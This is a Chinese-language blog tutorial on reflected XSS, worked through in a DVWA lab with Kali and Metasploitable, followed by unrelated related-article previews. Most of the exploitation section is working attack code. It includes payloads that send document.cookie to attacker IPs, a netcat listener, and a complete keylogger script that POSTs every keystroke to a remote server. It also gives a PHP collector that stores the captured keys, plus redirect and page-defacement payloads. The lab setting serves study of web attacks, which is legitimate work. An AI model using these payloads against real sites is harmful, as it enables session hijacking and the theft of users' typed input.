XSS——反射型原理和利用

最新推荐文章于 2024-05-31 09:50:58 发布
最新推荐文章于 2024-05-31 09:50:58 发布
阅读量5.6k 收藏 27
点赞数
文章标签: XSS漏洞 反射型XSS “钓鱼”的原理 键盘监听
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42342141/article/details/103298104
版权

申明

此文章内容仅供学习讨论,不参与非法钓鱼行为,实验中的服务器均为本机服务器!

工具

服务器——metasploitable2
被攻击机——windows(任意)
肉鸡服务器——windows
攻击机——kali
环境——DVWA

反射型XSS原理

通过web站点漏洞,向客户端交付恶意脚本代码,实现对客户端 的攻击。
攻击目标: web客户端
(主要是利用客户端浏览器来运行恶意脚本)
主要脚本语言: javascript
条件:

  • 服务器对用户提交数据过滤不严格
  • web站点能够返回用户输入的 数据(脚本)
  • 脚本在客户端执行恶意操作

在这里插入图片描述

1:攻击者向用户发送一封邮件,邮件里包含了一个链接,而链接里存在而已脚本代码
2:用户点击邮件里的链接,访问了web站点
3:站点将链接里包含的脚本代码返回给用户浏览器,并在浏览器里执行恶意代码

在这里插入图片描述

1:攻击者向用户发送一封邮件,邮件里包含了一个链接,而链接里存在而已脚本代码
2:用户点击邮件里的链接,访问了web站点
3:站点将链接里包含的脚本代码返回给用户浏览器,并在浏览器里执行恶意代码
4: 恶意代码是指向另一个服务器的连接,也就是用户访问了攻击者控制的第三方网站

反射型XSS利用

1、进入 DVWA中xss reflected模块

本次介绍是在low级,其他等级只是绕过问题,就不做解释

2、测试发现存在 反射型XSS 漏洞
输入 test js , 发现返回了输入的数据
实际过程中,推荐使用 brup suite 抓包分析

在这里插入图片描述
输入框输入 aabbcc 提交,利用bruosuite抓包
在这里插入图片描述
在response中发现服务器返回的页面数据
在这里插入图片描述

3、写入JS脚本
直接嵌入HTML中: <script>alert('XSS');</script>
重定向:<script>window.location="http://1.1.1.1"</script>
元素标签事件:
<body onload=alert('XSS')>
<a href='' onclick=alert('XSS')>type</a>
图片标签:<img src="https://www.baidu.com/a.jpg" onerror=alert('xss')>
链接标签: <a href="https://www.baidu.com">click</a>
其他标签:<iframe>,<div>,<link>
<iframe src="http://1.1.1.1/victim" height="0" width="0"></iframe>
<script>new image().src="http://1.1.1.1/c.php?output=" document.cookie</script>
篡改(实际上是没有,存储型XSS才能真正意义上篡改):<script>document.body.innerHTML="<div style=margin-top:20px visibility:visible;><h1>the website is under attack</h1></div>";</script>

输入
在这里插入图片描述

输入 : <script>window.location="http://1.1.1.131"</script>   
(1.1.1.131是kali的IP)
监听kaili 的 80 端口: nc -vnlp 80  查看 “中招” 的用户信息

可以试试看用户当前网页的cookie: <script>new Image().src="http://1.1.1.131/c.php?output="+document.cookie;</script>

.131 是kali, .1 是物理机(windows)
可以看出物理机已经”中招“了!
在这里插入图片描述

4、深入学习——引入第三方“肉鸡”服务器
1.js:
var img = new Image();
img.src = "http://1.1.1.133/cookies.php?cookie="+document.cookie;

肉鸡服务器(我的物理机):127.0.0.1
用户:还是用 的物理机(1.1.1.102) 访问物理机服务器下的 127.0.0.1/1.js 
攻击者kali(1.1.1.131):在kali端监听80端口
metasploitable站点服务器(1.1.1.133)
输入:<script src=http://127.0.0.1/1.js></script>

发现物理机(用户)访问 肉鸡服务器的1.js 后成功访问了攻击机并发送了cookie信息
在这里插入图片描述

5、构造并利用"键盘监听"
在肉鸡服务器构造 keylogger.js    (我是在物理机本地搭建的127.0.0.1/keylogger.js)
document.onkeypress = function(evt){
   evt = evt || window.event;
   key = String.fromCharCode(evt.charCode);
   if(key){
      var http = new XMLHttpRequest();
	  var param = encodeURI(key);
	  http.open("POST","http://192.168.20.8/keycollect.php",true);
	  http.setRequestHeader("Content-type","application/x-www-form-urlencoded");
	  http.send("key="+param);
	}
}

在这里插入图片描述

kali里开启apache: service apache2 start
cd /var/www/html 创建 keycollect.php 
<?php
$key=$_POST['key'];
$loadfile="keyclick.txt";
$fp = fopen($loadfile,"a");
fwrite($fp,$key);
fclose($fp);
?>
接着在该目录下创建 keyclick.txt 来存储用户从键盘输入的数据
记得给 keyclick.txt 加读写权限:chmod 777 keyclick.txt

在这里插入图片描述
在web服务器页面输入:

<script src=http://127.0.0.1/keylogger.js></script>

然后点击 submit, 从此刻其起,停留在此web页面的键盘输入将被kali里keycollect.php 接收并写入 keyclick.txt 中。

在这里插入图片描述在这里插入图片描述
即使没有在输入框输入,只是停留在那个页面敲击键盘的数据都会被窃取保留

初学者L_言
关注
  • 0
    点赞
  • 27
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
xss反射post_反射XSS的另类利用思路
weixin_40006977的博客
01-14 916
一、前言好久没有更新公众号了,最近一直在忙,差点都忘记有公众号这回事了。以后,,以后不能这样了,坚持更新,望各位表哥监督。二、简介好了,进入正文,以前的时候遇到的反射xss利用思路的思路就不是很多,get的还好一些,post如果不能改成get,就更难利用了,更别说xss在header里的了。前两天正好想到一个比较不错的思路,刚好给各位表哥分享,也许以后能用的到。就...
xsstry:xss漏洞利用平台
06-10
通过这个平台,我们可以深入了解XSS攻击的各种类,如反射、存储和DOMXSS,并学习如何有效地防止它们。 ### XSS漏洞详解 1. **反射XSS**:当用户提交的数据未经验证或过滤,直接在页面上显示时,就会产生...
反射XSS利用
single_g_l的博客
04-26 2441
目录 1、原理 2、特点 3、窃取cookie 4、利用 5、防御 1、原理 网站对用户输入的数据未做有效的过滤,攻击者可以将恶意代码脚本注入网站的页面中,达到执行恶意代码的目的。即用户输入的恶意代码,被执行。 2、特点 反射xss是通过给别人发送带有恶意脚本代码参数的URL,当URL地址被打开时,特有的恶意代码参数被HTML解析、执行。它的特点是非持久化,必须用户点击带有特定参数的链接才能引起。 3、窃取cookie 为了识别用户身份和保存会话功能,服务器允许用户的JS访问 所以会
反射XSS攻击原理及防御策略
最新发布
weixin_43822401的博客
05-31 518
反射XSS攻击是网络安全中的一个严重威胁。通过本文的介绍,我们了解了其原理、演示了攻击过程,并提出了一系列防御策略。作为Web开发者和安全专家,我们必须时刻保持警惕,采取最佳实践来保护我们的应用程序和用户免受这类攻击的侵害。
漫谈反射xss利用.txt
stilling2006的专栏
01-03 2146
晚上无聊,没打草稿,想到哪,写到哪,凑合看吧. 先打个作者:Y35U 1,反射xss大吗? 反射xss相比flashxss和存储xss要多多了. so对于用户基数越大的网站,反射xss的威力就越大 因为多嘛,所以利用者会大增。 再者,存储的封的会快,而反射的封的相对不及时。 xss中,普遍认为存储的危害最大,那是要看你X谁了 如果你要x管理员,那肯定是存储的危害大 如果你要x更多的人(跟你同等身
反射 XSS
weixin_34120274的博客
10-08 495
反射XSS科普paper,大牛略过。--:在Web2.0技术的发展下越来越多的计算工作被放到客户端处理,由于程序员的疏忽,导致了许多的安全漏洞XSS属于比较常见的一种,在前几年XSS还并不怎么被人重视,但如今,随着XSS漏洞的危害日益增大,如校内和baidu空间前阵子的XSSWORM等等,其危害之大也引起了大家的重视。XSS的类大体分为三种:反射XSS、持久XSS以及DOMXSS,相比...
浅谈反射XSS利用
weixin_34258838的博客
01-23 716
|=---------------------------------------------------------------------------=| |=-------------------------=[ 浅谈反射XSS利用 ]=-------------------------=| |=-------------------------------...
JS-XSS-.rar_XSS_js XSS
09-20
XSS分为三种类反射XSS、存储XSS和DOMXSS,每种类都有其特定的攻击方式和防护手段。 1. **反射XSS**:这种类XSS是通过诱使用户点击一个包含恶意脚本的链接来实现的。攻击者构造一个带有恶意代码的...
XSS漏洞
04-05
XSS攻击主要分为三类:反射XSS、存储XSS和DOMXSS。 1. 反射XSS:这是最常见的XSS,攻击者通过构造恶意URL,诱使用户点击。当用户访问这个URL时,恶意脚本会被浏览器执行。例如,一个不安全的搜索功能...
XSS跨站脚本攻击在Java开发中防范的方法
01-09
2. **反射XSS**(Non-Persistent XSS/Reflected XSS):这类攻击通常发生在用户点击恶意链接或URL后触发。恶意脚本会作为参数嵌入到URL中,并在目标网站处理这些参数时执行。 在给定的部分内容中,提到了一种常见...
XSS转码 && struts2 property标签的bug
03-21
XSs代码插入方式.mht”文件可能包含了各种XSS攻击的常见手法,比如存储XSS反射XSS和DOMXSS。这些不同类XSS攻击有各自的注入方式和应用场景,理解它们可以帮助开发者更好地识别和防止XSS风险。 最后,...
渗透测试基础-反射XSS原理及实操
weixin_45488495的博客
04-17 9264
渗透测试基础-反射XSS原理及实操XSS是什么漏洞总结 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????! XSS是什么 因为人们经常将跨站脚本攻击(Cross Site Scripting)缩写为CSS,但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。因此,将跨站脚本攻击缩写为XSS。这就是XSS名字的由来。XSS攻击是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供
【web-攻击用户】(9.1.4)查找并利用XSS漏洞--反射
08-27 1050
【查找并利用XSS漏洞反射
利用反射XSS二次注入绕过CSP form-action限制
weixin_30379911的博客
04-20 174
利用反射XSS二次注入绕过CSP form-action限制 翻译:SecurityToolkit 0x01 简单介绍 CSP(Content-Security-Policy)是为了缓解XSS而存在的一种策略, 开发者可以设置一些规则来限制页面可以加载的内容.那文本中所说的form-action又是干啥的呢?用他可以限制form标签"action"属性的指向页面, 这样可以防止攻击者...
反射、存储XSS漏洞利用
a_helloworlds的博客
04-09 2781
反射XSS利用过程 1. 恶意的攻击者发给受害者一个链接(链接中携带xss代码) 2. 攻击者诱使受害者点开这个链接 3. XSS代码被提交到有XSS漏洞的Web应用程序上 4. WEB应用程序没有过滤提交上来的数据,或者过滤不严格。 5. WEB应用程序输出用户提交上来的数据(包含XSS代码)。 6. 用户浏览器渲染返回的HTML页面...
XSS-反射
热门推荐
qq_39416206的博客
03-14 1万+
xss反射
XSS跨站脚本攻击
qq_42253044的博客
01-03 368
XSS跨站脚本攻击 XSS,全称Cross Site Scripting,即跨站脚本攻击,某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要强调的是,XSS不仅仅限于JavaScript,还包括flash等其它脚本语言。根据恶意代码是否存储在服务器中,XSS可以分为存储XSS反射XSS。 DOMXSS由于其特殊性,...
存储xss反射xss有哪些异同点
05-12
存储XSS反射XSS是两种常见的跨站脚本攻击,它们的主要异同点如下: 异同点: 1. 攻击方式:存储 XSS反射 XSS 都是通过在 Web 页面中插入恶意脚本代码,来实现攻击的。 2. 攻击原理:存储 XSS反射 XSS 都是利用了 Web 应用程序对用户输入数据的信任,通过篡改 Web 页面中的数据来实现攻击。 3. 危害程度:存储 XSS反射 XSS 都能够导致用户的隐私泄露、账号被盗、系统被入侵等严重后果。 4. 预防措施:存储 XSS反射 XSS 的预防措施基本相同,主要包括对输入数据进行过滤和验证、采用安全的编程语言和框架、使用 CSP 策略等。 异同点: 1. 漏洞位置:存储 XSS 漏洞通常出现在 Web 应用程序的数据库、文件系统、内存中等存储位置,而反射 XSS 漏洞则出现在 Web 应用程序的请求参数中。 2. 攻击方式:存储 XSS 恶意代码通常会被存储到 Web 服务器上,然后在用户请求页面时被动执行,而反射 XSS 恶意代码则是通过 URL 参数等传递给 Web 服务器,然后被动执行。 3. 攻击数量:存储 XSS 恶意代码通常只需要插入一次即可攻击多个用户,而反射 XSS 恶意代码则需要每次传递参数时才能攻击一个用户。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值